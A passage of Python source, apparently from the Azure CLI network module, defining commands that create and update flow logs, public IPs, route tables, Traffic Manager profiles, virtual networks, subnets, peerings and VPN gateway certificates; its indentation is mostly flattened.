c.set_param('type', log_format)
c.set_param('version', log_version)
if traffic_analytics_workspace is not None:
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not workspace:
raise CLIError('Name or ID of workspace is invalid')
        # guard against a flow log that has no analytics configuration at all
        if instance.flow_analytics_configuration is None:
            instance.flow_analytics_configuration = cmd.get_models('TrafficAnalyticsProperties')()
        if instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration is None:
            analytics_conf = cmd.get_models('TrafficAnalyticsConfigurationProperties')
            instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration = analytics_conf()
with cmd.update_context(
instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration) as c:
c.set_param('enabled', traffic_analytics_enabled)
c.set_param('workspace_id', workspace.properties['customerId'])
c.set_param('workspace_region', workspace.location)
c.set_param('workspace_resource_id', workspace.id)
c.set_param('traffic_analytics_interval', traffic_analytics_interval)
return instance
def list_nw_flow_log(client, watcher_rg, watcher_name, location):
return client.list(watcher_rg, watcher_name)
def delete_nw_flow_log(client, watcher_rg, watcher_name, location, flow_log_name):
return client.begin_delete(watcher_rg, watcher_name, flow_log_name)
def start_nw_troubleshooting(cmd, client, watcher_name, watcher_rg, resource, storage_account,
storage_path, resource_type=None, resource_group_name=None,
no_wait=False):
TroubleshootingParameters = cmd.get_models('TroubleshootingParameters')
params = TroubleshootingParameters(target_resource_id=resource, storage_id=storage_account,
storage_path=storage_path)
return sdk_no_wait(no_wait, client.begin_get_troubleshooting, watcher_rg, watcher_name, params)
def show_nw_troubleshooting_result(cmd, client, watcher_name, watcher_rg, resource, resource_type=None,
resource_group_name=None):
query_troubleshooting_parameters = cmd.get_models('QueryTroubleshootingParameters')(target_resource_id=resource)
return client.begin_get_troubleshooting_result(watcher_rg, watcher_name, query_troubleshooting_parameters)
def run_network_configuration_diagnostic(cmd, client, watcher_rg, watcher_name, resource,
direction=None, protocol=None, source=None, destination=None,
destination_port=None, queries=None,
resource_group_name=None, resource_type=None, parent=None):
NetworkConfigurationDiagnosticParameters, NetworkConfigurationDiagnosticProfile = \
cmd.get_models('NetworkConfigurationDiagnosticParameters', 'NetworkConfigurationDiagnosticProfile')
if not queries:
queries = [NetworkConfigurationDiagnosticProfile(
direction=direction,
protocol=protocol,
source=source,
destination=destination,
destination_port=destination_port
)]
params = NetworkConfigurationDiagnosticParameters(target_resource_id=resource, profiles=queries)
return client.begin_get_network_configuration_diagnostic(watcher_rg, watcher_name, params)
# endregion
# region CustomIpPrefix
def create_custom_ip_prefix(cmd, client, resource_group_name, custom_ip_prefix_name, location=None,
cidr=None, tags=None, zone=None, signed_message=None, authorization_message=None,
custom_ip_prefix_parent=None, no_wait=False):
CustomIpPrefix = cmd.get_models('CustomIpPrefix')
prefix = CustomIpPrefix(
location=location,
cidr=cidr,
zones=zone,
tags=tags,
signed_message=signed_message,
authorization_message=authorization_message
)
if custom_ip_prefix_parent:
try:
            # look up the parent prefix (assumed to live in the same resource group), not the prefix being created
            prefix.custom_ip_prefix_parent = client.get(resource_group_name, custom_ip_prefix_parent)
        except ResourceNotFoundError:
            raise ResourceNotFoundError("Custom ip prefix parent {} doesn't exist".format(custom_ip_prefix_parent))
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, custom_ip_prefix_name, prefix)
def update_custom_ip_prefix(instance, signed_message=None, authorization_message=None, tags=None):
if tags is not None:
instance.tags = tags
if signed_message is not None:
instance.signed_message = signed_message
if authorization_message is not None:
instance.authorization_message = authorization_message
return instance
# endregion
# region PublicIPAddresses
def create_public_ip(cmd, resource_group_name, public_ip_address_name, location=None, tags=None,
allocation_method=None, dns_name=None,
idle_timeout=4, reverse_fqdn=None, version=None, sku=None, tier=None, zone=None, ip_tags=None,
public_ip_prefix=None, edge_zone=None, ip_address=None):
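    """Create a public IP address; when no allocation method is given, Standard SKUs default to
    Static and Basic to Dynamic.
    """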
IPAllocationMethod, PublicIPAddress, PublicIPAddressDnsSettings, SubResource = cmd.get_models(
'IPAllocationMethod', 'PublicIPAddress', 'PublicIPAddressDnsSettings', 'SubResource')
client = network_client_factory(cmd.cli_ctx).public_ip_addresses
if not allocation_method:
allocation_method = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
public_ip_args = {
'location': location,
'tags': tags,
'public_ip_allocation_method': allocation_method,
'idle_timeout_in_minutes': idle_timeout,
'ip_address': ip_address,
'dns_settings': None
}
if cmd.supported_api_version(min_api='2016-09-01'):
public_ip_args['public_ip_address_version'] = version
if cmd.supported_api_version(min_api='2017-06-01'):
public_ip_args['zones'] = zone
if cmd.supported_api_version(min_api='2017-11-01'):
public_ip_args['ip_tags'] = ip_tags
if cmd.supported_api_version(min_api='2018-07-01') and public_ip_prefix:
public_ip_args['public_ip_prefix'] = SubResource(id=public_ip_prefix)
if sku:
public_ip_args['sku'] = {'name': sku}
if tier:
if not sku:
public_ip_args['sku'] = {'name': 'Basic'}
public_ip_args['sku'].update({'tier': tier})
public_ip = PublicIPAddress(**public_ip_args)
if dns_name or reverse_fqdn:
public_ip.dns_settings = PublicIPAddressDnsSettings(
domain_name_label=dns_name,
reverse_fqdn=reverse_fqdn)
if edge_zone:
public_ip.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, public_ip_address_name, public_ip)
def update_public_ip(cmd, instance, dns_name=None, allocation_method=None, version=None,
idle_timeout=None, reverse_fqdn=None, tags=None, sku=None, ip_tags=None,
public_ip_prefix=None):
if dns_name is not None or reverse_fqdn is not None:
if instance.dns_settings:
if dns_name is not None:
instance.dns_settings.domain_name_label = dns_name
if reverse_fqdn is not None:
instance.dns_settings.reverse_fqdn = reverse_fqdn
else:
PublicIPAddressDnsSettings = cmd.get_models('PublicIPAddressDnsSettings')
instance.dns_settings = PublicIPAddressDnsSettings(domain_name_label=dns_name, fqdn=None,
reverse_fqdn=reverse_fqdn)
if allocation_method is not None:
instance.public_ip_allocation_method = allocation_method
if version is not None:
instance.public_ip_address_version = version
if idle_timeout is not None:
instance.idle_timeout_in_minutes = idle_timeout
if tags is not None:
instance.tags = tags
if sku is not None:
instance.sku.name = sku
if ip_tags:
instance.ip_tags = ip_tags
if public_ip_prefix:
SubResource = cmd.get_models('SubResource')
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
return instance
def create_public_ip_prefix(cmd, client, resource_group_name, public_ip_prefix_name, prefix_length,
version=None, location=None, tags=None, zone=None, edge_zone=None,
custom_ip_prefix_name=None):
PublicIPPrefix, PublicIPPrefixSku = cmd.get_models('PublicIPPrefix', 'PublicIPPrefixSku')
prefix = PublicIPPrefix(
location=location,
prefix_length=prefix_length,
sku=PublicIPPrefixSku(name='Standard'),
tags=tags,
zones=zone
)
if cmd.supported_api_version(min_api='2019-08-01'):
prefix.public_ip_address_version = version if version is not None else 'ipv4'
if cmd.supported_api_version(min_api='2020-06-01') and custom_ip_prefix_name:
cip_client = network_client_factory(cmd.cli_ctx).custom_ip_prefixes
try:
prefix.custom_ip_prefix = cip_client.get(resource_group_name, custom_ip_prefix_name)
except ResourceNotFoundError:
raise ResourceNotFoundError('Custom ip prefix {} doesn\'t exist.'.format(custom_ip_prefix_name))
if edge_zone:
prefix.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, public_ip_prefix_name, prefix)
def update_public_ip_prefix(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
# endregion
# region RouteFilters
def create_route_filter(cmd, client, resource_group_name, route_filter_name, location=None, tags=None):
RouteFilter = cmd.get_models('RouteFilter')
return client.begin_create_or_update(resource_group_name, route_filter_name,
RouteFilter(location=location, tags=tags))
def list_route_filters(client, resource_group_name=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def create_route_filter_rule(cmd, client, resource_group_name, route_filter_name, rule_name, access, communities,
location=None):
RouteFilterRule = cmd.get_models('RouteFilterRule')
return client.begin_create_or_update(resource_group_name, route_filter_name, rule_name,
RouteFilterRule(access=access, communities=communities,
location=location))
# endregion
# region RouteTables
def create_route_table(cmd, resource_group_name, route_table_name, location=None, tags=None,
disable_bgp_route_propagation=None):
RouteTable = cmd.get_models('RouteTable')
ncf = network_client_factory(cmd.cli_ctx)
route_table = RouteTable(location=location, tags=tags)
if cmd.supported_api_version(min_api='2017-10-01'):
route_table.disable_bgp_route_propagation = disable_bgp_route_propagation
return ncf.route_tables.begin_create_or_update(resource_group_name, route_table_name, route_table)
def update_route_table(instance, tags=None, disable_bgp_route_propagation=None):
if tags == '':
instance.tags = None
elif tags is not None:
instance.tags = tags
if disable_bgp_route_propagation is not None:
instance.disable_bgp_route_propagation = disable_bgp_route_propagation
return instance
def create_route(cmd, resource_group_name, route_table_name, route_name, next_hop_type, address_prefix,
next_hop_ip_address=None):
Route = cmd.get_models('Route')
route = Route(next_hop_type=next_hop_type, address_prefix=address_prefix,
next_hop_ip_address=next_hop_ip_address, name=route_name)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.routes.begin_create_or_update(resource_group_name, route_table_name, route_name, route)
def update_route(instance, address_prefix=None, next_hop_type=None, next_hop_ip_address=None):
if address_prefix is not None:
instance.address_prefix = address_prefix
if next_hop_type is not None:
instance.next_hop_type = next_hop_type
if next_hop_ip_address is not None:
instance.next_hop_ip_address = next_hop_ip_address
return instance
# endregion
# region ServiceEndpoints
def create_service_endpoint_policy(cmd, resource_group_name, service_endpoint_policy_name, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policies
ServiceEndpointPolicy = cmd.get_models('ServiceEndpointPolicy')
policy = ServiceEndpointPolicy(tags=tags, location=location)
return client.begin_create_or_update(resource_group_name, service_endpoint_policy_name, policy)
def list_service_endpoint_policies(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policies
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def update_service_endpoint_policy(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
def create_service_endpoint_policy_definition(cmd, resource_group_name, service_endpoint_policy_name,
service_endpoint_policy_definition_name, service, service_resources,
description=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policy_definitions
ServiceEndpointPolicyDefinition = cmd.get_models('ServiceEndpointPolicyDefinition')
policy_def = ServiceEndpointPolicyDefinition(description=description, service=service,
service_resources=service_resources)
return client.begin_create_or_update(resource_group_name, service_endpoint_policy_name,
service_endpoint_policy_definition_name, policy_def)
def update_service_endpoint_policy_definition(instance, service=None, service_resources=None, description=None):
if service is not None:
instance.service = service
if service_resources is not None:
instance.service_resources = service_resources
if description is not None:
instance.description = description
return instance
# endregion
# region TrafficManagers
def list_traffic_manager_profiles(cmd, resource_group_name=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list_by_subscription()
def create_traffic_manager_profile(cmd, traffic_manager_profile_name, resource_group_name,
routing_method, unique_dns_name, monitor_path=None,
monitor_port=80, monitor_protocol=MonitorProtocol.http.value,
profile_status=ProfileStatus.enabled.value,
ttl=30, tags=None, interval=None, timeout=None, max_failures=None,
monitor_custom_headers=None, status_code_ranges=None, max_return=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
from azure.mgmt.trafficmanager.models import Profile, DnsConfig, MonitorConfig
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
if monitor_path is None and monitor_protocol == 'HTTP':
monitor_path = '/'
profile = Profile(location='global', tags=tags, profile_status=profile_status,
traffic_routing_method=routing_method,
dns_config=DnsConfig(relative_name=unique_dns_name, ttl=ttl),
monitor_config=MonitorConfig(protocol=monitor_protocol,
port=monitor_port,
path=monitor_path,
interval_in_seconds=interval,
timeout_in_seconds=timeout,
tolerated_number_of_failures=max_failures,
custom_headers=monitor_custom_headers,
expected_status_code_ranges=status_code_ranges),
max_return=max_return)
return client.create_or_update(resource_group_name, traffic_manager_profile_name, profile)
def update_traffic_manager_profile(instance, profile_status=None, routing_method=None, tags=None,
monitor_protocol=None, monitor_port=None, monitor_path=None,
ttl=None, timeout=None, interval=None, max_failures=None,
monitor_custom_headers=None, status_code_ranges=None, max_return=None):
if tags is not None:
instance.tags = tags
if profile_status is not None:
instance.profile_status = profile_status
if routing_method is not None:
instance.traffic_routing_method = routing_method
if ttl is not None:
instance.dns_config.ttl = ttl
if monitor_protocol is not None:
instance.monitor_config.protocol = monitor_protocol
if monitor_port is not None:
instance.monitor_config.port = monitor_port
if monitor_path == '':
instance.monitor_config.path = None
elif monitor_path is not None:
instance.monitor_config.path = monitor_path
if interval is not None:
instance.monitor_config.interval_in_seconds = interval
if timeout is not None:
instance.monitor_config.timeout_in_seconds = timeout
if max_failures is not None:
instance.monitor_config.tolerated_number_of_failures = max_failures
if monitor_custom_headers is not None:
instance.monitor_config.custom_headers = monitor_custom_headers
if status_code_ranges is not None:
instance.monitor_config.expected_status_code_ranges = status_code_ranges
if max_return is not None:
instance.max_return = max_return
# TODO: Remove workaround after https://github.com/Azure/azure-rest-api-specs/issues/1940 fixed
for endpoint in instance.endpoints:
endpoint._validation = { # pylint: disable=protected-access
'name': {'readonly': False},
'type': {'readonly': False},
}
return instance
def create_traffic_manager_endpoint(cmd, resource_group_name, profile_name, endpoint_type, endpoint_name,
target_resource_id=None, target=None,
endpoint_status=None, weight=None, priority=None,
endpoint_location=None, endpoint_monitor_status=None,
min_child_endpoints=None, geo_mapping=None,
monitor_custom_headers=None, subnets=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
from azure.mgmt.trafficmanager.models import Endpoint
ncf = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).endpoints
endpoint = Endpoint(target_resource_id=target_resource_id, target=target,
endpoint_status=endpoint_status, weight=weight, priority=priority,
endpoint_location=endpoint_location,
endpoint_monitor_status=endpoint_monitor_status,
min_child_endpoints=min_child_endpoints,
geo_mapping=geo_mapping,
subnets=subnets,
custom_headers=monitor_custom_headers)
return ncf.create_or_update(resource_group_name, profile_name, endpoint_type, endpoint_name,
endpoint)
def update_traffic_manager_endpoint(instance, endpoint_type=None, endpoint_location=None,
endpoint_status=None, endpoint_monitor_status=None,
priority=None, target=None, target_resource_id=None,
weight=None, min_child_endpoints=None, geo_mapping=None,
subnets=None, monitor_custom_headers=None):
if endpoint_location is not None:
instance.endpoint_location = endpoint_location
if endpoint_status is not None:
instance.endpoint_status = endpoint_status
if endpoint_monitor_status is not None:
instance.endpoint_monitor_status = endpoint_monitor_status
if priority is not None:
instance.priority = priority
if target is not None:
instance.target = target
if target_resource_id is not None:
instance.target_resource_id = target_resource_id
if weight is not None:
instance.weight = weight
if min_child_endpoints is not None:
instance.min_child_endpoints = min_child_endpoints
if geo_mapping is not None:
instance.geo_mapping = geo_mapping
if subnets is not None:
instance.subnets = subnets
if monitor_custom_headers:
instance.custom_headers = monitor_custom_headers
return instance
def list_traffic_manager_endpoints(cmd, resource_group_name, profile_name, endpoint_type=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
profile = client.get(resource_group_name, profile_name)
return [e for e in profile.endpoints if not endpoint_type or e.type.endswith(endpoint_type)]
# endregion
# region VirtualNetworks
# pylint: disable=too-many-locals
def create_vnet(cmd, resource_group_name, vnet_name, vnet_prefixes='10.0.0.0/16',
subnet_name=None, subnet_prefix=None, dns_servers=None,
location=None, tags=None, vm_protection=None, ddos_protection=None,
ddos_protection_plan=None, network_security_group=None, edge_zone=None, flowtimeout=None):
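    """Create a virtual network with an optional initial subnet, DNS servers, DDoS/VM protection,
    DDoS protection plan and flow timeout settings.
    """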
AddressSpace, DhcpOptions, Subnet, VirtualNetwork, SubResource, NetworkSecurityGroup = \
cmd.get_models('AddressSpace', 'DhcpOptions', 'Subnet', 'VirtualNetwork',
'SubResource', 'NetworkSecurityGroup')
client = network_client_factory(cmd.cli_ctx).virtual_networks
tags = tags or {}
vnet = VirtualNetwork(
location=location, tags=tags,
dhcp_options=DhcpOptions(dns_servers=dns_servers),
address_space=AddressSpace(address_prefixes=(vnet_prefixes if isinstance(vnet_prefixes, list) else [vnet_prefixes]))) # pylint: disable=line-too-long
if subnet_name:
if cmd.supported_api_version(min_api='2018-08-01'):
vnet.subnets = [Subnet(name=subnet_name,
address_prefix=subnet_prefix[0] if len(subnet_prefix) == 1 else None,
address_prefixes=subnet_prefix if len(subnet_prefix) > 1 else None,
network_security_group=NetworkSecurityGroup(id=network_security_group)
if network_security_group else None)]
else:
vnet.subnets = [Subnet(name=subnet_name, address_prefix=subnet_prefix)]
if cmd.supported_api_version(min_api='2017-09-01'):
vnet.enable_ddos_protection = ddos_protection
vnet.enable_vm_protection = vm_protection
if cmd.supported_api_version(min_api='2018-02-01'):
vnet.ddos_protection_plan = SubResource(id=ddos_protection_plan) if ddos_protection_plan else None
if edge_zone:
vnet.extended_location = _edge_zone_model(cmd, edge_zone)
if flowtimeout is not None:
vnet.flow_timeout_in_minutes = flowtimeout
return cached_put(cmd, client.begin_create_or_update, vnet, resource_group_name, vnet_name)
def update_vnet(cmd, instance, vnet_prefixes=None, dns_servers=None, ddos_protection=None, vm_protection=None,
ddos_protection_plan=None, flowtimeout=None):
# server side validation reports pretty good error message on invalid CIDR,
# so we don't validate at client side
AddressSpace, DhcpOptions, SubResource = cmd.get_models('AddressSpace', 'DhcpOptions', 'SubResource')
if vnet_prefixes and instance.address_space:
instance.address_space.address_prefixes = vnet_prefixes
elif vnet_prefixes:
instance.address_space = AddressSpace(address_prefixes=vnet_prefixes)
if dns_servers == ['']:
instance.dhcp_options.dns_servers = None
elif dns_servers and instance.dhcp_options:
instance.dhcp_options.dns_servers = dns_servers
elif dns_servers:
instance.dhcp_options = DhcpOptions(dns_servers=dns_servers)
if ddos_protection is not None:
instance.enable_ddos_protection = ddos_protection
if vm_protection is not None:
instance.enable_vm_protection = vm_protection
if ddos_protection_plan == '':
instance.ddos_protection_plan = None
elif ddos_protection_plan is not None:
instance.ddos_protection_plan = SubResource(id=ddos_protection_plan)
if flowtimeout is not None:
instance.flow_timeout_in_minutes = flowtimeout
return instance
def _set_route_table(ncf, resource_group_name, route_table, subnet):
if route_table:
is_id = is_valid_resource_id(route_table)
rt = None
if is_id:
res_id = parse_resource_id(route_table)
rt = ncf.route_tables.get(res_id['resource_group'], res_id['name'])
else:
rt = ncf.route_tables.get(resource_group_name, route_table)
subnet.route_table = rt
elif route_table == '':
subnet.route_table = None
def create_subnet(cmd, resource_group_name, virtual_network_name, subnet_name,
address_prefix, network_security_group=None,
route_table=None, service_endpoints=None, service_endpoint_policy=None,
delegations=None, nat_gateway=None,
disable_private_endpoint_network_policies=None,
disable_private_link_service_network_policies=None):
NetworkSecurityGroup, ServiceEndpoint, Subnet, SubResource = cmd.get_models(
'NetworkSecurityGroup', 'ServiceEndpointPropertiesFormat', 'Subnet', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
if cmd.supported_api_version(min_api='2018-08-01'):
subnet = Subnet(
name=subnet_name,
address_prefixes=address_prefix if len(address_prefix) > 1 else None,
address_prefix=address_prefix[0] if len(address_prefix) == 1 else None
)
if cmd.supported_api_version(min_api='2019-02-01') and nat_gateway:
subnet.nat_gateway = SubResource(id=nat_gateway)
else:
subnet = Subnet(name=subnet_name, address_prefix=address_prefix)
if network_security_group:
subnet.network_security_group = NetworkSecurityGroup(id=network_security_group)
_set_route_table(ncf, resource_group_name, route_table, subnet)
if service_endpoints:
subnet.service_endpoints = []
for service in service_endpoints:
subnet.service_endpoints.append(ServiceEndpoint(service=service))
if service_endpoint_policy:
subnet.service_endpoint_policies = []
for policy in service_endpoint_policy:
subnet.service_endpoint_policies.append(SubResource(id=policy))
if delegations:
subnet.delegations = delegations
if disable_private_endpoint_network_policies is True:
subnet.private_endpoint_network_policies = "Disabled"
if disable_private_endpoint_network_policies is False:
subnet.private_endpoint_network_policies = "Enabled"
if disable_private_link_service_network_policies is True:
subnet.private_link_service_network_policies = "Disabled"
if disable_private_link_service_network_policies is False:
subnet.private_link_service_network_policies = "Enabled"
vnet = cached_get(cmd, ncf.virtual_networks.get, resource_group_name, virtual_network_name)
upsert_to_collection(vnet, 'subnets', subnet, 'name')
vnet = cached_put(
cmd, ncf.virtual_networks.begin_create_or_update, vnet, resource_group_name, virtual_network_name).result()
return get_property(vnet.subnets, subnet_name)
def update_subnet(cmd, instance, resource_group_name, address_prefix=None, network_security_group=None,
route_table=None, service_endpoints=None, delegations=None, nat_gateway=None,
service_endpoint_policy=None, disable_private_endpoint_network_policies=None,
disable_private_link_service_network_policies=None):
NetworkSecurityGroup, ServiceEndpoint, SubResource = cmd.get_models(
'NetworkSecurityGroup', 'ServiceEndpointPropertiesFormat', 'SubResource')
if address_prefix:
if cmd.supported_api_version(min_api='2018-08-01'):
instance.address_prefixes = address_prefix if len(address_prefix) > 1 else None
instance.address_prefix = address_prefix[0] if len(address_prefix) == 1 else None
else:
instance.address_prefix = address_prefix
if cmd.supported_api_version(min_api='2019-02-01') and nat_gateway:
instance.nat_gateway = SubResource(id=nat_gateway)
elif nat_gateway == '':
instance.nat_gateway = None
if network_security_group:
instance.network_security_group = NetworkSecurityGroup(id=network_security_group)
elif network_security_group == '': # clear it
instance.network_security_group = None
_set_route_table(network_client_factory(cmd.cli_ctx), resource_group_name, route_table, instance)
if service_endpoints == ['']:
instance.service_endpoints = None
elif service_endpoints:
instance.service_endpoints = []
for service in service_endpoints:
instance.service_endpoints.append(ServiceEndpoint(service=service))
if service_endpoint_policy == '':
instance.service_endpoint_policies = None
elif service_endpoint_policy:
instance.service_endpoint_policies = []
for policy in service_endpoint_policy:
instance.service_endpoint_policies.append(SubResource(id=policy))
if delegations:
instance.delegations = delegations
if disable_private_endpoint_network_policies:
instance.private_endpoint_network_policies = "Disabled"
elif disable_private_endpoint_network_policies is not None:
instance.private_endpoint_network_policies = "Enabled"
if disable_private_link_service_network_policies:
instance.private_link_service_network_policies = "Disabled"
elif disable_private_link_service_network_policies is not None:
instance.private_link_service_network_policies = "Enabled"
return instance
def list_avail_subnet_delegations(cmd, resource_group_name=None, location=None):
client = network_client_factory(cmd.cli_ctx)
if resource_group_name:
return client.available_resource_group_delegations.list(location, resource_group_name)
return client.available_delegations.list(location)
def create_vnet_peering(cmd, resource_group_name, virtual_network_name, virtual_network_peering_name,
remote_virtual_network, allow_virtual_network_access=False,
allow_forwarded_traffic=False, allow_gateway_transit=False,
use_remote_gateways=False):
if not is_valid_resource_id(remote_virtual_network):
remote_virtual_network = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=remote_virtual_network
)
SubResource, VirtualNetworkPeering = cmd.get_models('SubResource', 'VirtualNetworkPeering')
peering = VirtualNetworkPeering(
id=resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=virtual_network_name),
name=virtual_network_peering_name,
remote_virtual_network=SubResource(id=remote_virtual_network),
allow_virtual_network_access=allow_virtual_network_access,
allow_gateway_transit=allow_gateway_transit,
allow_forwarded_traffic=allow_forwarded_traffic,
use_remote_gateways=use_remote_gateways)
aux_subscription = parse_resource_id(remote_virtual_network)['subscription']
ncf = network_client_factory(cmd.cli_ctx, aux_subscriptions=[aux_subscription])
return ncf.virtual_network_peerings.begin_create_or_update(
resource_group_name, virtual_network_name, virtual_network_peering_name, peering)
def update_vnet_peering(cmd, resource_group_name, virtual_network_name, virtual_network_peering_name, **kwargs):
peering = kwargs['parameters']
aux_subscription = parse_resource_id(peering.remote_virtual_network.id)['subscription']
ncf = network_client_factory(cmd.cli_ctx, aux_subscriptions=[aux_subscription])
return ncf.virtual_network_peerings.begin_create_or_update(
resource_group_name, virtual_network_name, virtual_network_peering_name, peering)
def list_available_ips(cmd, resource_group_name, virtual_network_name):
client = network_client_factory(cmd.cli_ctx).virtual_networks
vnet = client.get(resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name)
start_ip = vnet.address_space.address_prefixes[0].split('/')[0]
available_ips = client.check_ip_address_availability(resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
ip_address=start_ip)
return available_ips.available_ip_addresses
# endregion
# region VirtualNetworkGateways
def create_vnet_gateway_root_cert(cmd, resource_group_name, gateway_name, public_cert_data, cert_name):
VpnClientRootCertificate = cmd.get_models('VpnClientRootCertificate')
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if not gateway.vpn_client_configuration:
raise CLIError("Must add address prefixes to gateway '{}' prior to adding a root cert."
.format(gateway_name))
config = gateway.vpn_client_configuration
if config.vpn_client_root_certificates is None:
config.vpn_client_root_certificates = []
cert = VpnClientRootCertificate(name=cert_name, public_cert_data=public_cert_data)
upsert_to_collection(config, 'vpn_client_root_certificates', cert, 'name')
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def delete_vnet_gateway_root_cert(cmd, resource_group_name, gateway_name, cert_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
config = gateway.vpn_client_configuration
try:
cert = next(c for c in config.vpn_client_root_certificates if c.name == cert_name)
except (AttributeError, StopIteration):
raise CLIError('Certificate "{}" not found in gateway "{}"'.format(cert_name, gateway_name))
config.vpn_client_root_certificates.remove(cert)
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def create_vnet_gateway_revoked_cert(cmd, resource_group_name, gateway_name, thumbprint, cert_name):
VpnClientRevokedCertificate = cmd.get_models('VpnClientRevokedCertificate')
config, gateway, ncf = _prep_cert_create(cmd, gateway_name, resource_group_name)
cert = VpnClientRevokedCertificate(name=cert_name, thumbprint=thumbprint)
upsert_to_collection(config, 'vpn_client_revoked_certificates', cert, 'name')
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def delete_vnet_gateway_revoked_cert(cmd, resource_group_name, gateway_name, cert_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
config = gateway.vpn_client_configuration
try:
cert = next(c for c in config.vpn_client_revoked_certificates if c.name == cert_name)
except (AttributeError, StopIteration):
raise CLIError('Certificate "{}" not found in gateway "{}"'.format(cert_name, gateway_name))
config.vpn_client_revoked_certificates.remove(cert)
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def _prep_cert_create(cmd, gateway_name, resource_group_name):
VpnClientConfiguration = cmd.get_models('VpnClientConfiguration')
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if not gateway.vpn_client_configuration:
gateway.vpn_client_configuration = VpnClientConfiguration()
config = gateway.vpn_client_configuration
if not config.vpn_client_address_pool or not config.vpn_client_address_pool.address_prefixes:
raise CLIError('Address prefixes must be set on VPN gateways before adding'
' certificates. Please use "update" with --address-prefixes first.')
if config.vpn_client_revoked_certificates is None:
config.vpn_client_revoked_certificates = []
if config.vpn_client_root_certificates is None:
config.vpn_client_root_certificates = []
return config, gateway, ncf
def create_vnet_gateway(cmd, resource_group_name, virtual_network_gateway_name, public_ip_address,
virtual_network, location=None, tags=None,
no_wait=False, gateway_type=None, sku=None, vpn_type=None, vpn_gateway_generation=None,
asn=None, bgp_peering_address=None, peer_weight=None,
address_prefixes=None, radius_server=None, radius_secret=None, client_protocol=None,
gateway_default_site=None, custom_routes=None, aad_tenant=None, aad_audience=None,
aad_issuer=None, root_cert_data=None, root_cert_name=None, vpn_auth_type=None, edge_zone=None,
nat_rule=None):
(VirtualNetworkGateway, BgpSettings, SubResource, VirtualNetworkGatewayIPConfiguration, VirtualNetworkGatewaySku,
VpnClientConfiguration, AddressSpace, VpnClientRootCertificate, VirtualNetworkGatewayNatRule,
VpnNatRuleMapping) = cmd.get_models(
'VirtualNetworkGateway', 'BgpSettings', 'SubResource', 'VirtualNetworkGatewayIPConfiguration',
'VirtualNetworkGatewaySku', 'VpnClientConfiguration', 'AddressSpace', 'VpnClientRootCertificate',
'VirtualNetworkGatewayNatRule', 'VpnNatRuleMapping')
client = network_client_factory(cmd.cli_ctx).virtual_network_gateways
subnet = virtual_network + '/subnets/GatewaySubnet'
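    # Two public IP addresses put the gateway in active-active mode; a single IP means active-standby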
active = len(public_ip_address) == 2
vnet_gateway = VirtualNetworkGateway(
gateway_type=gateway_type, vpn_type=vpn_type, vpn_gateway_generation=vpn_gateway_generation, location=location,
tags=tags, sku=VirtualNetworkGatewaySku(name=sku, tier=sku), active=active, ip_configurations=[],
gateway_default_site=SubResource(id=gateway_default_site) if gateway_default_site else None)
for i, public_ip in enumerate(public_ip_address):
ip_configuration = VirtualNetworkGatewayIPConfiguration(
subnet=SubResource(id=subnet),
public_ip_address=SubResource(id=public_ip),
private_ip_allocation_method='Dynamic',
name='vnetGatewayConfig{}'.format(i)
)
vnet_gateway.ip_configurations.append(ip_configuration)
if asn or bgp_peering_address or peer_weight:
vnet_gateway.enable_bgp = True
vnet_gateway.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address,
peer_weight=peer_weight)
if any((address_prefixes, client_protocol)):
vnet_gateway.vpn_client_configuration = VpnClientConfiguration()
vnet_gateway.vpn_client_configuration.vpn_client_address_pool = AddressSpace()
vnet_gateway.vpn_client_configuration.vpn_client_address_pool.address_prefixes = address_prefixes
vnet_gateway.vpn_client_configuration.vpn_client_protocols = client_protocol
